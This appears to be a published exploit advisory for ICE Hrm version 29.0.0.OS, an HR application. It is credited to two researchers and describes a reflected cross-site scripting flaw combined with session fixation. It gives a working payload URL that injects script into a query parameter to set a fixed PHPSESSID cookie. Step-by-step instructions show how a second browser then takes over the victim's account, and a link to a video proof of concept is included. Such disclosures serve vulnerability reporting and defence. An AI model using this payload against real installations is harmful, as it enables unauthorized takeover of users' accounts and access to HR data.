# Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation # Exploit Author: *Piyush Patil *& Rafal Lykowski # Vendor Homepage: https://icehrm.com/ # Version: 29.0.0.OS # Tested on: Windows 10 and Kali #Description ICE Hrm Version 29.0.0.OS is vulnerable to session fixation and reflected cross site scripting leading to full account takeover. #Steps to reproduce the attack: 1-Open 2 different browsers (or one with 2 windows - one of them opened in incognito mode) 2-Log in to the system, 3-Paste this payload into the address bar and load it: http://localhost:8070/app/?g=admin&n=dashboard&m=21484%27%3bdocument.cookie=%22PHPSESSID=12345;path=/;%22%2f%2f It simulates victim executing XSS. 4-In the incognito window do not log in but just modify session cookie value to 12345. 5-Navigate to any application url - you will realize that you are authorized. It means that your account was taken over. #Video POC: https://drive.google.com/file/d/1egynTGh0XsETgfu7SJtIPv1GZCs1dJ67/view?usp=sharing